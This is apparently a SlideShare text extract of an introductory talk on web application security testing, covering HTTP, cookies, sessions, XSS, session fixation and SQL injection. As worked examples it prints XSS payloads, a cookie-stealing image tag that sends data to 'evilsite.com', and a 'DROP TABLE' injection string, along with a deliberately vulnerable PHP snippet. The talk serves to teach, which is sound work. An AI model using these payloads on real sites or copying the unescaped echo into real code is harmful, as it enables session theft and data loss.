SlideShare a Scribd company logo
1 of 180
Download to read offline
Fundamentals of web
application security &
   security testing
         t0m <bobtfish@bobtfish.net>
Who are you?
• Open source hacker
• github.com/bobtfish/
• Perl guy (sorry) - 160 CPAN modules
• Core team for Catalyst and Plack web
  frameworks.
• Ex professional security tester / R&D
This talk
This talk
• ~ 1h long
This talk
• ~ 1h long
• Covers the very basics
 • HTTP
 • Host headers
 • Cookies
This talk
• ~ 1h long
• Covers the very basics
 • HTTP
 • Host headers
 • Cookies
• Tools
 • Paros / Charles / etc
Webapp security testing
• Sessions
 • Session fixation attacks
• Sessions
 • Session fixation attacks
• XSS (General HTML injection)
 • How to test
 • How to exploit
• Sessions
 • Session fixation attacks
• XSS (General HTML injection)
 • How to test
 • How to exploit
• SQL Injection
• NOT comprehensive.
• NOT comprehensive.
• JUST the basics.
You don’t need to be a
     programmer
You don’t need to be a
     programmer

• I’m going to assume you know a bit about
  the internet
You don’t need to be a
     programmer

• I’m going to assume you know a bit about
  the internet
• And that you’ve at least seen HTML before.
Workshop on Sunday
Workshop on Sunday

• No schedule - made by you!
Workshop on Sunday

• No schedule - made by you!
Workshop on Sunday

• No schedule - made by you!

• Deeper and more practical discussion
HTML
HTML
• The markup format that web pages are
  written in.
HTML
• The markup format that web pages are
  written in.
• I’m just assuming you all know the basics
HTML
• The markup format that web pages are
  written in.
• I’m just assuming you all know the basics
• Sorry if you don’t ;P
HTML
• The markup format that web pages are
  written in.
• I’m just assuming you all know the basics
• Sorry if you don’t ;P
• Can almost always be sloppy - browser
  tries to do the right thing.
HTTP - The very basics
HTTP - The very basics
• HTTP goes over TCP/IP
HTTP - The very basics
• HTTP goes over TCP/IP
 • Reliable, ordered
HTTP - The very basics
• HTTP goes over TCP/IP
 • Reliable, ordered
 • Host and port
HTTP - The very basics
• HTTP goes over TCP/IP
 • Reliable, ordered
 • Host and port
• Request / Response
HTTP - The very basics
• HTTP goes over TCP/IP
 • Reliable, ordered
 • Host and port
• Request / Response
 • URL
HTTP - The very basics
• HTTP goes over TCP/IP
 • Reliable, ordered
 • Host and port
• Request / Response
 • URL
 • Method
Request / Response
Request / Response

• You ask the sever for some data
Request / Response

• You ask the sever for some data
• It does some work
Request / Response

• You ask the sever for some data
• It does some work
• And serves you a response, possibly
  including data, called a ‘body’
Dynamic
Dynamic

• The response could just be a file on disc
Dynamic

• The response could just be a file on disc
• HTML, image, etc
Dynamic

• The response could just be a file on disc
• HTML, image, etc
• We’re interested about when it’s dynamic -
  i.e. when your input changes the HTML
  output.
GET / HTTP/1.0

HTTP/1.1 200 OK
Date: Wed, 29 Aug 2012 21:47:59 GMT
Server: Apache
Last-Modified: Wed, 27 Jul 2011 10:18:21 GMT
ETag: "1c888b-0-4a90a5e239540"
Accept-Ranges: bytes
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug
GET / HTTP/1.0
GET / HTTP/1.0

• Simplest possible HTTP request
GET / HTTP/1.0

• Simplest possible HTTP request
• Method - GET
GET / HTTP/1.0

• Simplest possible HTTP request
• Method - GET
• URL /
GET / HTTP/1.0

• Simplest possible HTTP request
• Method - GET
• URL /
• HTTP version
GET / HTTP/1.0

• Simplest possible HTTP request
• Method - GET
• URL /
• HTTP version
• Followed by rnrn
GET / HTTP/1.0

• Headers optional after first line
GET / HTTP/1.0

• Headers optional after first line
• Body can be supplied after rnrn if you
  specify a non-zero content length
GET / HTTP/1.0

• Headers optional after first line
• Body can be supplied after rnrn if you
  specify a non-zero content length
• There will be examples of this later
HTTP/1.1 200 OK
HTTP/1.1 200 OK
• Always the first line of the response
HTTP/1.1 200 OK
• Always the first line of the response
• We asked for 1.0, got 1.1 back
HTTP/1.1 200 OK
• Always the first line of the response
• We asked for 1.0, got 1.1 back
• 200 is response code.
 • 2xx - Success
 • 3xx - Redirect
 • 4xx - User error
 • 5xx - Server error
Date: Wed, 29 Aug 2012
    21:47:59 GMT

• Other headers now follow. All in format:
  Key:Value
• Date: RFC822
• Optional
Server: Apache

• Sometimes has exact versions and
  extensions
• Easy to lie
• Optional
Last-Modified: Wed, 27
Jul 2011 10:18:21 GMT

• Used for caching (maybe)
• Optional
ETag:
"1c888b-0-4a90a5e239540"


• Used for caching (maybe)
• Optional
Accept-Ranges: bytes

• ‘Partial GET’
• Ask for a byte range in the file
• Get back just that part
• Used by ‘download managers’ to resume
• Optional
Content-Length: 0

• Mandatory!
• Specifies how long the body is
• Can be 0
Vary: Accept-Encoding

• For caching
 • What header fields mean a different
    version of the document
 • E.g. language detection
• Optional
Connection: close

• Server is going to drop the connection, you
  have to reconnect.
• Possible to keep the connection persistent,
  if you ask for it
Content-Type:
           text/html

• How the browser should interpret the
  body
• Mandatory for documents with a body
HTTP 1.1


• Adds a mandatory Host header to the
  request
• Allows > 1 web site per IP address
GET / HTTP/1.1
Host: goatse.co.uk

HTTP/1.1 200 OK
Date: Wed, 29 Aug 2012 21:49:49 GMT
Server: Apache
Last-Modified: Wed, 27 Jul 2011 10:18:21 GMT
ETag: "1c888b-0-4a90a5e239540"
Accept-Ranges: bytes
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug
Sending data to the
      server
Sending data to the
         server

• Encode it into the URI
Sending data to the
         server

• Encode it into the URI
 • /with/a/path
Sending data to the
         server

• Encode it into the URI
 • /with/a/path
 • /?or=parameters
POST
POST
• Used to send data back to the server
POST
• Used to send data back to the server
• Content-Type: application/x-www-form-
  urlencoded
POST
• Used to send data back to the server
• Content-Type: application/x-www-form-
  urlencoded
• Has a Content-Length, and a body
POST
• Used to send data back to the server
• Content-Type: application/x-www-form-
  urlencoded
• Has a Content-Length, and a body
• Data is encoded like this:
  foo=bar&foo2=baz
POST
POST / HTTP/1.1
Host: www.example.com
Content-Length: 17
Content-Type: application/x-www-form-urlencoded

foo=bar&foo2=quux
Forms
• HTML forms are the primary means of
  getting user data to the server
• Data is in the body, not the URL, so they
  don’t get saved in bookmarks
• <form> tag
• <input> tag
Ok - basics covered!
Ok - basics covered!

• Phew!
Ok - basics covered!

• Phew!
• Lets put all this stuff together - into an
  application.
Ok - basics covered!

• Phew!
• Lets put all this stuff together - into an
  application.
• And then hack it.
Simplest possible app
<html>
Data is: <form>
<input name=”foo” value=”<?php echo
$_GET['foo'] ?>” />
<input type=”submit” />
</form>
</html>
http://server/test.php?
        foo=foo
FAIL
FAIL
• Did you spot the epic fail?
FAIL
• Did you spot the epic fail?
• value=”<?php echo $_GET['foo'] ?>”
FAIL
• Did you spot the epic fail?
• value=”<?php echo $_GET['foo'] ?>”
• Golden rule - never ever accept input
  without validating it’s sane
FAIL
• Did you spot the epic fail?
• value=”<?php echo $_GET['foo'] ?>”
• Golden rule - never ever accept input
  without validating it’s sane
• Golden rule - never ever output anything
  that may have come from external input
  without encoding it
WHY?
WHY?
• You can send: ?foo="><blink>Foo<
  %2Fblink>
WHY?
• You can send: ?foo="><blink>Foo<
  %2Fblink>
• Comes out as: <input name="foo"
  value=""><blink>Foo</blink>
WHY?
• You can send: ?foo="><blink>Foo<
  %2Fblink>
• Comes out as: <input name="foo"
  value=""><blink>Foo</blink>
• You just added HTML to the document -
  fail!
Javascript
Javascript

• Is where it all goes really wrong
Javascript

• Is where it all goes really wrong
• Can change or rewrite the page
Javascript

• Is where it all goes really wrong
• Can change or rewrite the page
• Can be inserted inline into HTML
Javascript

• Is where it all goes really wrong
• Can change or rewrite the page
• Can be inserted inline into HTML
• foo="><script>document.removeChild(doc
  ument.getElementsByTagName('html')[0])<
  %2Fscript>
Bye bye page!
Less simple example
Less simple example

• Add data storage
Less simple example

• Add data storage
• E.g. Message board multiple people can
  look at
Less simple example

• Add data storage
• E.g. Message board multiple people can
  look at
• Doom!
Less simple example

• Add data storage
• E.g. Message board multiple people can
  look at
• Doom!
• Or at least vandalism
More theory
More theory

• Sorry, but it’s necessary
More theory

• Sorry, but it’s necessary
• People’s credit card numbers are behind
  login pages
More theory

• Sorry, but it’s necessary
• People’s credit card numbers are behind
  login pages
• So we have to understand how logins work
  to steal them
Cookies
Cookies
Cookies


Not like that!
Cookies
Cookies


 Or that!
Cookies
Cookies


Definitely not!
Set-Cookie
Set-Cookie

• A request header
Set-Cookie

• A request header
• Set-Cookie: foo=bar
Set-Cookie

• A request header
• Set-Cookie: foo=bar
• Set-Cookie: foo=bar; expires=Thu, 01-
  Jan-1970 00:01:40 GMT; path=/;
  domain=example.net
Affects subsequent
       requests


Browser returns “Cookie: foo=bar” header
Sessions
Sessions

• Hand each visitor a random session token,
  identify them in future
Sessions

• Hand each visitor a random session token,
  identify them in future
• Login credentials only transmitted once
Sessions

• Hand each visitor a random session token,
  identify them in future
• Login credentials only transmitted once
• Allows login to be SSL (and rest of site not)
Sessions
Sessions


• Shared secret
Sessions


• Shared secret
• If it stops being a secret, you lose!
Stealing cookies
Stealing cookies
• Can get cookie data from javascript
Stealing cookies
• Can get cookie data from javascript
• If we find an HTML injection vulnerability,
  we can run code that grabs the cookie
Stealing cookies
• Can get cookie data from javascript
• If we find an HTML injection vulnerability,
  we can run code that grabs the cookie
• “Same origin policy” - cannot transmit
  elsewhere.
Stealing cookies
• Can get cookie data from javascript
• If we find an HTML injection vulnerability,
  we can run code that grabs the cookie
• “Same origin policy” - cannot transmit
  elsewhere.
• Cheat! Add content to the document.
<img src=”http://evilsite.com/?data=here” />
Lets step through that
Lets step through that
• Message board site gives users a cookie
  when they login
Lets step through that
• Message board site gives users a cookie
  when they login
• Cookie contains session token
Lets step through that
• Message board site gives users a cookie
  when they login
• Cookie contains session token
• You post an evil message containing
  Javascript
Lets step through that
• Message board site gives users a cookie
  when they login
• Cookie contains session token
• You post an evil message containing
  Javascript
• Other users view your message
Lets step through that
Lets step through that
• Other user’s browsers execute your
  javascript
Lets step through that
• Other user’s browsers execute your
  javascript
• It grabs their cookie
Lets step through that
• Other user’s browsers execute your
  javascript
• It grabs their cookie
• Adds to their page: <img src=”http://
  evilsite.com/?data=cookie_data” />
Lets step through that
• Other user’s browsers execute your
  javascript
• It grabs their cookie
• Adds to their page: <img src=”http://
  evilsite.com/?data=cookie_data” />
• Users browser tries to download image
Lets step through that
Lets step through that
• evilsite.com records the cookie
Lets step through that
• evilsite.com records the cookie
• evilsite.com serves a 1px x 1px transparent
  gif
Lets step through that
• evilsite.com records the cookie
• evilsite.com serves a 1px x 1px transparent
  gif
• I can now post messages as any (still logged
  in) user who viewed my message.
Lets step through that
• evilsite.com records the cookie
• evilsite.com serves a 1px x 1px transparent
  gif
• I can now post messages as any (still logged
  in) user who viewed my message.
• Having the users’s cookie allows you to
  become the user
Did you notice the
    handwave?
Did you notice the
       handwave?
• I need a way to get your cookie into my
  browser
Did you notice the
       handwave?
• I need a way to get your cookie into my
  browser
• This is easy to do - find a proxy library in
  your favourite programming language ;P
Did you notice the
       handwave?
• I need a way to get your cookie into my
  browser
• This is easy to do - find a proxy library in
  your favourite programming language ;P
• Or tools you can just download
Session fixation
Session fixation
• Quite a common bug
Session fixation
• Quite a common bug
• Allows you to specify the session ID you’d
  like
Session fixation
• Quite a common bug
• Allows you to specify the session ID you’d
  like
• Useful for abusing XSS elsewhere
Session fixation
• Quite a common bug
• Allows you to specify the session ID you’d
  like
• Useful for abusing XSS elsewhere
• Also good to steal logins without needing
  XSS.
Session fixation
• Quite a common bug
• Allows you to specify the session ID you’d
  like
• Useful for abusing XSS elsewhere
• Also good to steal logins without needing
  XSS.
• /?sessionID=XXXXXXXXXXX
Tools
Tools - Paros


• http://www.parosproxy.org/
Webapp security testing
Webapp security testing
Tools - Charles


• OSX only
• Costs money (free trial)
Webapp security testing
Tools - Firebug
Tools - Firebug

• Firefox addon
Tools - Firebug

• Firefox addon
• Allows you to debug javascript and HTML
Tools - Firebug

• Firefox addon
• Allows you to debug javascript and HTML
• Useful for getting exploits working in
  combination with another tool
Webapp security testing
SQL Injection
SQL Injection

• SQL used by databases, for data storage
SQL Injection

• SQL used by databases, for data storage
• Tables, with columns and rows
SQL Injection

• SQL used by databases, for data storage
• Tables, with columns and rows
• SELECT id, name FROM users WHERE
  name = ‘fred’ AND password = ‘example’;
SQL Injection

• SQL used by databases, for data storage
• Tables, with columns and rows
• SELECT id, name FROM users WHERE
  name = ‘fred’ AND password = ‘example’;
• SAME ISSUE AS BEFORE
SQL Injection
SELECT id, name FROM users WHERE name
= ‘Robert'); DROP TABLE Students;--’ AND
password = ‘example’;
First query.
No password needed!

SELECT id, name FROM users WHERE name
= ‘Robert'); DROP TABLE Students;--’ AND
password = ‘example’;
Second query.
     Ruins your day!

SELECT id, name FROM users WHERE name
= ‘Robert'); DROP TABLE Students;--’ AND
password = ‘example’;
Comment - ignored!


SELECT id, name FROM users WHERE name
= ‘Robert'); DROP TABLE Students;--’ AND
password = ‘example’;
Golden Rules
Golden Rules

• Never ever accept input without validating
  it’s sane.
Golden Rules

• Never ever accept input without validating
  it’s sane.
• Never ever output anything that may have
  come from external input without encoding
  it.
Thanks for listening!

• Hope that wasn’t too boring :)
• Feel free to come chat to me.
• Or mail me: bobtfish@bobtfish.net
• Or grab me on irc: t0m on Freenode
• More in-depth workshop on Sunday!

More Related Content

What's hot

Class 1 - World Wide Web Introduction
Class 1 - World Wide Web IntroductionClass 1 - World Wide Web Introduction
Class 1 - World Wide Web IntroductionAhmed Swilam
 
Basics of HTML5 for Phonegap
Basics of HTML5 for PhonegapBasics of HTML5 for Phonegap
Basics of HTML5 for PhonegapRakesh Jha
 
WordPress CLI in-depth
WordPress CLI in-depthWordPress CLI in-depth
WordPress CLI in-depthSanjay Willie
 
NotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersNotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersRob Fuller
 
Day 7 - Make it Fast
Day 7 - Make it FastDay 7 - Make it Fast
Day 7 - Make it FastBarry Jones
 
Perl in the Internet of Things
Perl in the Internet of ThingsPerl in the Internet of Things
Perl in the Internet of ThingsDave Cross
 
HTML Training Course in Persian
HTML Training Course in PersianHTML Training Course in Persian
HTML Training Course in PersianAbbas Naderi
 
Concepts for Operating a Web Site
Concepts for Operating a Web SiteConcepts for Operating a Web Site
Concepts for Operating a Web SiteCan Burak Çilingir
 
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariSite Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariJoseph Scott
 
CakePHP 2.0 - PHP Matsuri 2011
CakePHP 2.0 - PHP Matsuri 2011CakePHP 2.0 - PHP Matsuri 2011
CakePHP 2.0 - PHP Matsuri 2011Graham Weldon
 
Web Development in Perl
Web Development in PerlWeb Development in Perl
Web Development in PerlNaveen Gupta
 
Web Browsers And Other Mistakes
Web Browsers And Other MistakesWeb Browsers And Other Mistakes
Web Browsers And Other Mistakesguest2821a2
 
The Recording HTTP Proxy: Not Yet Another Messiah - Bulgaria PHP 2019
The Recording HTTP Proxy: Not Yet Another Messiah - Bulgaria PHP 2019The Recording HTTP Proxy: Not Yet Another Messiah - Bulgaria PHP 2019
The Recording HTTP Proxy: Not Yet Another Messiah - Bulgaria PHP 2019Viktor Todorov
 
Building APIs with MVC 6 and OAuth
Building APIs with MVC 6 and OAuthBuilding APIs with MVC 6 and OAuth
Building APIs with MVC 6 and OAuthFilip Ekberg
 
Re-thinking Performance tuning with HTTP2
Re-thinking Performance tuning with HTTP2Re-thinking Performance tuning with HTTP2
Re-thinking Performance tuning with HTTP2Vinci Rufus
 
BTV PHP - Building Fast Websites
BTV PHP - Building Fast WebsitesBTV PHP - Building Fast Websites
BTV PHP - Building Fast WebsitesJonathan Klein
 
Web Browsers And Other Mistakes
Web Browsers And Other MistakesWeb Browsers And Other Mistakes
Web Browsers And Other Mistakeskuza55
 
Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)Darren Duke
 

What's hot (20)

CORS and (in)security
CORS and (in)securityCORS and (in)security
CORS and (in)security
 
Class 1 - World Wide Web Introduction
Class 1 - World Wide Web IntroductionClass 1 - World Wide Web Introduction
Class 1 - World Wide Web Introduction
 
Basics of HTML5 for Phonegap
Basics of HTML5 for PhonegapBasics of HTML5 for Phonegap
Basics of HTML5 for Phonegap
 
WordPress CLI in-depth
WordPress CLI in-depthWordPress CLI in-depth
WordPress CLI in-depth
 
NotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersNotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for Pentesters
 
Day 7 - Make it Fast
Day 7 - Make it FastDay 7 - Make it Fast
Day 7 - Make it Fast
 
Perl in the Internet of Things
Perl in the Internet of ThingsPerl in the Internet of Things
Perl in the Internet of Things
 
HTML Training Course in Persian
HTML Training Course in PersianHTML Training Course in Persian
HTML Training Course in Persian
 
Concepts for Operating a Web Site
Concepts for Operating a Web SiteConcepts for Operating a Web Site
Concepts for Operating a Web Site
 
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariSite Performance - From Pinto to Ferrari
Site Performance - From Pinto to Ferrari
 
CakePHP 2.0 - PHP Matsuri 2011
CakePHP 2.0 - PHP Matsuri 2011CakePHP 2.0 - PHP Matsuri 2011
CakePHP 2.0 - PHP Matsuri 2011
 
Web Development in Perl
Web Development in PerlWeb Development in Perl
Web Development in Perl
 
Web Browsers And Other Mistakes
Web Browsers And Other MistakesWeb Browsers And Other Mistakes
Web Browsers And Other Mistakes
 
The Recording HTTP Proxy: Not Yet Another Messiah - Bulgaria PHP 2019
The Recording HTTP Proxy: Not Yet Another Messiah - Bulgaria PHP 2019The Recording HTTP Proxy: Not Yet Another Messiah - Bulgaria PHP 2019
The Recording HTTP Proxy: Not Yet Another Messiah - Bulgaria PHP 2019
 
Building APIs with MVC 6 and OAuth
Building APIs with MVC 6 and OAuthBuilding APIs with MVC 6 and OAuth
Building APIs with MVC 6 and OAuth
 
Top ten-list
Top ten-listTop ten-list
Top ten-list
 
Re-thinking Performance tuning with HTTP2
Re-thinking Performance tuning with HTTP2Re-thinking Performance tuning with HTTP2
Re-thinking Performance tuning with HTTP2
 
BTV PHP - Building Fast Websites
BTV PHP - Building Fast WebsitesBTV PHP - Building Fast Websites
BTV PHP - Building Fast Websites
 
Web Browsers And Other Mistakes
Web Browsers And Other MistakesWeb Browsers And Other Mistakes
Web Browsers And Other Mistakes
 
Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)
 

Viewers also liked

Linkedinemployerbrandplaybook 130326154834-phpapp02
Linkedinemployerbrandplaybook 130326154834-phpapp02Linkedinemployerbrandplaybook 130326154834-phpapp02
Linkedinemployerbrandplaybook 130326154834-phpapp02Nick Goldstein
 
Get Going With Green: Executive Summary (China)
Get Going With Green: Executive Summary (China)Get Going With Green: Executive Summary (China)
Get Going With Green: Executive Summary (China)Ogilvy
 
Stop Wasting Your Analytics Budget - edUi 2016
Stop Wasting Your Analytics Budget - edUi 2016Stop Wasting Your Analytics Budget - edUi 2016
Stop Wasting Your Analytics Budget - edUi 2016Mitch Daniels
 
Sri lanka - Selective Journeys
Sri lanka -  Selective JourneysSri lanka -  Selective Journeys
Sri lanka - Selective JourneysShawn Hendricks
 
Appealing a Criminal Conviction in California
Appealing a Criminal Conviction in CaliforniaAppealing a Criminal Conviction in California
Appealing a Criminal Conviction in CaliforniaDomenic J. Lombardo
 
Communicating Budgetary and Economic Information With Style at CBO
Communicating Budgetary and Economic Information With Style at CBOCommunicating Budgetary and Economic Information With Style at CBO
Communicating Budgetary and Economic Information With Style at CBOCongressional Budget Office
 
UK newsbrands drive 605.3 million social media actions January - August 2015
UK newsbrands drive 605.3 million social media actions January - August 2015UK newsbrands drive 605.3 million social media actions January - August 2015
UK newsbrands drive 605.3 million social media actions January - August 2015Newsworks
 
Catedral de huancayo 01
Catedral de huancayo 01Catedral de huancayo 01
Catedral de huancayo 01ronald_23
 
cuestionario de computacion 6 de turismo
cuestionario de computacion 6 de turismocuestionario de computacion 6 de turismo
cuestionario de computacion 6 de turismojusue21993
 
WASSIC Crowdsourcing
WASSIC CrowdsourcingWASSIC Crowdsourcing
WASSIC Crowdsourcingpiers_higgs
 
"What we've learnt from Ember.js developing our new product" by Guillaume Pot...
"What we've learnt from Ember.js developing our new product" by Guillaume Pot..."What we've learnt from Ember.js developing our new product" by Guillaume Pot...
"What we've learnt from Ember.js developing our new product" by Guillaume Pot...TheFamily
 
What's in a pipeline? And why you should care
What's in a pipeline? And why you should careWhat's in a pipeline? And why you should care
What's in a pipeline? And why you should careSarah Usher
 
Softlayer無制限ストレージを ownCloudで使う
Softlayer無制限ストレージを ownCloudで使うSoftlayer無制限ストレージを ownCloudで使う
Softlayer無制限ストレージを ownCloudで使うTetsurou Yano
 
[092 2016-minedu]-[15-07-2016 11 29-53]-rvm n° 092-2016-minedu
[092 2016-minedu]-[15-07-2016 11 29-53]-rvm n° 092-2016-minedu[092 2016-minedu]-[15-07-2016 11 29-53]-rvm n° 092-2016-minedu
[092 2016-minedu]-[15-07-2016 11 29-53]-rvm n° 092-2016-mineduELVIN VEGA ESPINOZA
 

Viewers also liked (20)

Linkedinemployerbrandplaybook 130326154834-phpapp02
Linkedinemployerbrandplaybook 130326154834-phpapp02Linkedinemployerbrandplaybook 130326154834-phpapp02
Linkedinemployerbrandplaybook 130326154834-phpapp02
 
Get Going With Green: Executive Summary (China)
Get Going With Green: Executive Summary (China)Get Going With Green: Executive Summary (China)
Get Going With Green: Executive Summary (China)
 
Stop Wasting Your Analytics Budget - edUi 2016
Stop Wasting Your Analytics Budget - edUi 2016Stop Wasting Your Analytics Budget - edUi 2016
Stop Wasting Your Analytics Budget - edUi 2016
 
Words related to law
Words related to lawWords related to law
Words related to law
 
Topics in IO
Topics in IOTopics in IO
Topics in IO
 
Sri lanka - Selective Journeys
Sri lanka -  Selective JourneysSri lanka -  Selective Journeys
Sri lanka - Selective Journeys
 
Appealing a Criminal Conviction in California
Appealing a Criminal Conviction in CaliforniaAppealing a Criminal Conviction in California
Appealing a Criminal Conviction in California
 
Communicating Budgetary and Economic Information With Style at CBO
Communicating Budgetary and Economic Information With Style at CBOCommunicating Budgetary and Economic Information With Style at CBO
Communicating Budgetary and Economic Information With Style at CBO
 
UK newsbrands drive 605.3 million social media actions January - August 2015
UK newsbrands drive 605.3 million social media actions January - August 2015UK newsbrands drive 605.3 million social media actions January - August 2015
UK newsbrands drive 605.3 million social media actions January - August 2015
 
Catedral de huancayo 01
Catedral de huancayo 01Catedral de huancayo 01
Catedral de huancayo 01
 
cuestionario de computacion 6 de turismo
cuestionario de computacion 6 de turismocuestionario de computacion 6 de turismo
cuestionario de computacion 6 de turismo
 
Kalifornia
Kalifornia Kalifornia
Kalifornia
 
WASSIC Crowdsourcing
WASSIC CrowdsourcingWASSIC Crowdsourcing
WASSIC Crowdsourcing
 
"What we've learnt from Ember.js developing our new product" by Guillaume Pot...
"What we've learnt from Ember.js developing our new product" by Guillaume Pot..."What we've learnt from Ember.js developing our new product" by Guillaume Pot...
"What we've learnt from Ember.js developing our new product" by Guillaume Pot...
 
Telégrafo Óptico
Telégrafo ÓpticoTelégrafo Óptico
Telégrafo Óptico
 
What's in a pipeline? And why you should care
What's in a pipeline? And why you should careWhat's in a pipeline? And why you should care
What's in a pipeline? And why you should care
 
Softlayer無制限ストレージを ownCloudで使う
Softlayer無制限ストレージを ownCloudで使うSoftlayer無制限ストレージを ownCloudで使う
Softlayer無制限ストレージを ownCloudで使う
 
Medvigy: The Amazon: A resilient natural system, or the ebb of the green ocean?
Medvigy: The Amazon: A resilient natural system, or the ebb of the green ocean?Medvigy: The Amazon: A resilient natural system, or the ebb of the green ocean?
Medvigy: The Amazon: A resilient natural system, or the ebb of the green ocean?
 
Bollywood Actresses Hairdos
Bollywood Actresses HairdosBollywood Actresses Hairdos
Bollywood Actresses Hairdos
 
[092 2016-minedu]-[15-07-2016 11 29-53]-rvm n° 092-2016-minedu
[092 2016-minedu]-[15-07-2016 11 29-53]-rvm n° 092-2016-minedu[092 2016-minedu]-[15-07-2016 11 29-53]-rvm n° 092-2016-minedu
[092 2016-minedu]-[15-07-2016 11 29-53]-rvm n° 092-2016-minedu
 

Similar to Webapp security testing

HTTP - The Protocol of Our Lives
HTTP - The Protocol of Our LivesHTTP - The Protocol of Our Lives
HTTP - The Protocol of Our LivesBrent Shaffer
 
XFLTReaT: a new dimension in tunnelling (BruCON 0x09 2017)
XFLTReaT: a new dimension in tunnelling (BruCON 0x09 2017)XFLTReaT: a new dimension in tunnelling (BruCON 0x09 2017)
XFLTReaT: a new dimension in tunnelling (BruCON 0x09 2017)Balazs Bucsay
 
Trick or XFLTReaT a.k.a. Tunnel All The Things
Trick or XFLTReaT a.k.a. Tunnel All The ThingsTrick or XFLTReaT a.k.a. Tunnel All The Things
Trick or XFLTReaT a.k.a. Tunnel All The ThingsBalazs Bucsay
 
Http - All you need to know
Http - All you need to knowHttp - All you need to know
Http - All you need to knowGökhan Şengün
 
Embracing HTTP in the era of API’s
Embracing HTTP in the era of API’sEmbracing HTTP in the era of API’s
Embracing HTTP in the era of API’sVisug
 
XFLTReaT: A New Dimension in Tunnelling (HITB GSEC 2017)
XFLTReaT: A New Dimension in Tunnelling (HITB GSEC 2017)XFLTReaT: A New Dimension in Tunnelling (HITB GSEC 2017)
XFLTReaT: A New Dimension in Tunnelling (HITB GSEC 2017)Balazs Bucsay
 
Modern Web Technologies — Jerusalem Web Professionals, January 2011
Modern Web Technologies — Jerusalem Web Professionals, January 2011Modern Web Technologies — Jerusalem Web Professionals, January 2011
Modern Web Technologies — Jerusalem Web Professionals, January 2011Reuven Lerner
 
Modern Web technologies (and why you should care): Megacomm, Jerusalem, Febru...
Modern Web technologies (and why you should care): Megacomm, Jerusalem, Febru...Modern Web technologies (and why you should care): Megacomm, Jerusalem, Febru...
Modern Web technologies (and why you should care): Megacomm, Jerusalem, Febru...Reuven Lerner
 
Dev traning 2016 intro to the web
Dev traning 2016   intro to the webDev traning 2016   intro to the web
Dev traning 2016 intro to the webSacheen Dhanjie
 
Html5 shubelal
Html5 shubelalHtml5 shubelal
Html5 shubelalShub
 
XFLTReaT: A New Dimension In Tunnelling (DeepSec 2017)
XFLTReaT: A New Dimension In Tunnelling (DeepSec 2017)XFLTReaT: A New Dimension In Tunnelling (DeepSec 2017)
XFLTReaT: A New Dimension In Tunnelling (DeepSec 2017)Balazs Bucsay
 
PHP language presentation
PHP language presentationPHP language presentation
PHP language presentationAnnujj Agrawaal
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
XFLTReat: a new dimension in tunnelling
XFLTReat:  a new dimension in tunnellingXFLTReat:  a new dimension in tunnelling
XFLTReat: a new dimension in tunnellingShakacon
 
XFLTReaT: A New Dimension in Tunneling (Shakacon 2017)
XFLTReaT: A New Dimension in Tunneling (Shakacon 2017)XFLTReaT: A New Dimension in Tunneling (Shakacon 2017)
XFLTReaT: A New Dimension in Tunneling (Shakacon 2017)Balazs Bucsay
 
Web Services PHP Tutorial
Web Services PHP TutorialWeb Services PHP Tutorial
Web Services PHP TutorialLorna Mitchell
 

Similar to Webapp security testing (20)

HTTP - The Protocol of Our Lives
HTTP - The Protocol of Our LivesHTTP - The Protocol of Our Lives
HTTP - The Protocol of Our Lives
 
XFLTReaT: a new dimension in tunnelling (BruCON 0x09 2017)
XFLTReaT: a new dimension in tunnelling (BruCON 0x09 2017)XFLTReaT: a new dimension in tunnelling (BruCON 0x09 2017)
XFLTReaT: a new dimension in tunnelling (BruCON 0x09 2017)
 
Trick or XFLTReaT a.k.a. Tunnel All The Things
Trick or XFLTReaT a.k.a. Tunnel All The ThingsTrick or XFLTReaT a.k.a. Tunnel All The Things
Trick or XFLTReaT a.k.a. Tunnel All The Things
 
Http - All you need to know
Http - All you need to knowHttp - All you need to know
Http - All you need to know
 
Embracing HTTP in the era of API’s
Embracing HTTP in the era of API’sEmbracing HTTP in the era of API’s
Embracing HTTP in the era of API’s
 
XFLTReaT: A New Dimension in Tunnelling (HITB GSEC 2017)
XFLTReaT: A New Dimension in Tunnelling (HITB GSEC 2017)XFLTReaT: A New Dimension in Tunnelling (HITB GSEC 2017)
XFLTReaT: A New Dimension in Tunnelling (HITB GSEC 2017)
 
Modern Web Technologies — Jerusalem Web Professionals, January 2011
Modern Web Technologies — Jerusalem Web Professionals, January 2011Modern Web Technologies — Jerusalem Web Professionals, January 2011
Modern Web Technologies — Jerusalem Web Professionals, January 2011
 
Modern Web technologies (and why you should care): Megacomm, Jerusalem, Febru...
Modern Web technologies (and why you should care): Megacomm, Jerusalem, Febru...Modern Web technologies (and why you should care): Megacomm, Jerusalem, Febru...
Modern Web technologies (and why you should care): Megacomm, Jerusalem, Febru...
 
Dev traning 2016 intro to the web
Dev traning 2016   intro to the webDev traning 2016   intro to the web
Dev traning 2016 intro to the web
 
Html5 shubelal
Html5 shubelalHtml5 shubelal
Html5 shubelal
 
XFLTReaT: A New Dimension In Tunnelling (DeepSec 2017)
XFLTReaT: A New Dimension In Tunnelling (DeepSec 2017)XFLTReaT: A New Dimension In Tunnelling (DeepSec 2017)
XFLTReaT: A New Dimension In Tunnelling (DeepSec 2017)
 
Web Services Tutorial
Web Services TutorialWeb Services Tutorial
Web Services Tutorial
 
Web services tutorial
Web services tutorialWeb services tutorial
Web services tutorial
 
PHP language presentation
PHP language presentationPHP language presentation
PHP language presentation
 
A Forgotten HTTP Invisibility Cloak
